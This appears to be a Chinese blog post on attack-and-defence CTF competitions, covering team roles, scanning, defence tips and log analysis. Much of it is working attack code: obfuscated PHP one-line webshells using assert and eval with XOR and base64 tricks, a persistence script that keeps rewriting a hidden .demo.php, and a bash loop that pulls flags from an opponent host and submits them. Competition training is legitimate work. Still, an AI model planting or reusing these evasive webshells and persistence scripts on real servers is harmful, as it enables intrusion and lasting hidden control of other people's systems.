CTF之AWD攻防

一张常规的CTF线下攻防思维导图

SSh登录

两三个人进行分工,一个粗略的看下web,有登陆口的话,就需要修改密码,将情况反馈给队友,让登陆ssh的小伙伴进行密码的修改,改成炒鸡复杂、然后将Web目录下载下来,上WAF、文件监控、端口扫描。将这几个工作分工好,顺序就像图上。

tips:将下载下来的Web目录理一遍,看是否有可疑的文件夹,比如bak。 依然记得有次比赛,有两台靶机,赛组提示弱口令。然后每一支队伍都奔着后台去了,结果有队伍在Web目录下发现了这个bak目录,打开发现是phpmyadmin,提示的弱口令是在这里用上。

网络拓扑

首先先理清好网络拓扑关系,节点与各链路之间的关联。这个需要下一步配合,要不然不知道对手在哪就GG。 示例:

主机发现

如果是在同个C段,或者B段,均可以使用RouterScan进行对80端口扫描进行扫描得出,嫌麻烦的话,就用httpscan这个小巧的脚本

千万要记得扫端口,这很重要。用nmap也行,自己写的脚本或者网上找的也行。

预留后门

有的比赛环境,为了照顾比较菜的选手(此处举手),预留了一句话后门。将整个web目录下载到本地,使用hm.exe、D盾或者别的扫描工具可以扫描得出(如果预留)

黑盒测试

防御及修复建议 1.将所有的登陆口密码进行修改(炒鸡复杂); 2.将上传页面的action地址修改为*,(机智小能手!!); 3.反序列化和命令执行,就去seebug或其他的站点找补丁; 4.待补充…

一句话

控制用的一句话木马,最好是需要菜刀配置的,这样做是为了不让别人轻易的利用你的一句话,要不然就只能等着别人用你的脚本捡分。 简单举例:

1
<?php ($_=@$_GET[2]).@$_($_POST[1]);?>

连接方式:php?2=assert密码是1。 献上我常用得一句话

1
2
3
4
5
6
7
8
<?php
$a=chr(96^5);
$b=chr(57^79);
$c=chr(15^110);
$d=chr(58^86);
$e='($_REQUEST[C])';
@assert($a.$b.$c.$d.$e);
?>

配置为?b=))99(rhC(tseuqeR+lave

1
2
3
<?php
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}
?>

配置填n985de9=QGV2YWwoJF9QT1NUWzBdKTs= 连接密码:0(零)

权限维持

1
2
3
4
5
6
7
8
9
10
11
<?php
set_time_limit(0);
ignore_user_abort(true);
$file = '.demo.php';
$shell = "<?php phpinfo();?>";
while(true){
file_put_contents($file, $shell);
system('chmod 777 .demo.php');
usleep(50);
}
?>

tips:.demo.php前面使用一个点,能很好的隐藏文件。 想要结束这个进程,除了最暴力的重启服务之外,更为优雅的如下:

1
2
3
4
5
6
7
<?php
while (1) {
$pid=1234;
@unlink('demo.php');
exec('kill -9 $pid');
}
?>

先查看进程,查看对应的pid,再执行即可。

Flag获取

上面的$shell内容看个人,线下赛可以直接使用<?php echo system("crul 10.0.0.2"); ?>之类的,只是说一个点,剩余的发挥空间由你们思考。 最好能写一个批量上传的,结合批量访问。批量访问参考PHP-定时任务 或者

1
2
3
4
5
6
7
#!/bin/bash
while true
do
flag=$(curl 'http://172.16.4.42:800')
curl --cookie "PHPSESSID=21il7pum6i3781pumljhv578c1; xdgame_username=%E5%B0%8F%E7%BA%A2%E5%B8%BD" --data "key="${flag} "http://172.16.4.42/index.php/wargame/submit"
sleep 1s
done

日志分析

日志分析的用途

  • 感知可能正在发生的攻击,从而规避存在的安全风险
  • 应急响应,还原攻击者的攻击路径,从而挽回已经造成的损失

记录log脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
date_default_timezone_set('Asia/Shanghai');
$ip = $_SERVER["REMOTE_ADDR"]; //记录访问者的ip
$filename = $_SERVER['PHP_SELF']; //访问者要访问的文件名
$parameter = $_SERVER["QUERY_STRING"]; //访问者要请求的参数
$time = date('Y-m-d H:i:s',time()); //访问时间
$logadd = '来访时间:'.$time.'-->'.'访问链接:'.'http://'.$ip.$filename.'?'.$parameter."\r\n";

// log记录
$fh = fopen("log.txt", "a");
fwrite($fh, $logadd);
fclose($fh);
?>

日志分析工具

  1. LogForensics 腾讯实验室 https://security.tencent.com/index.php/opensource/detail/15
  2. 北风飘然@金乌网络安全实验室 http://www.freebuf.com/sectool/126698.html
  3. 网络ID为piaox的安全从业人员: http://www.freebuf.com/sectool/110644.html
  4. 网络ID:SecSky http://www.freebuf.com/sectool/8982.html
  5. 网络ID:鬼魅羊羔 http://www.freebuf.com/articles/web/96675.html
请我吃糖~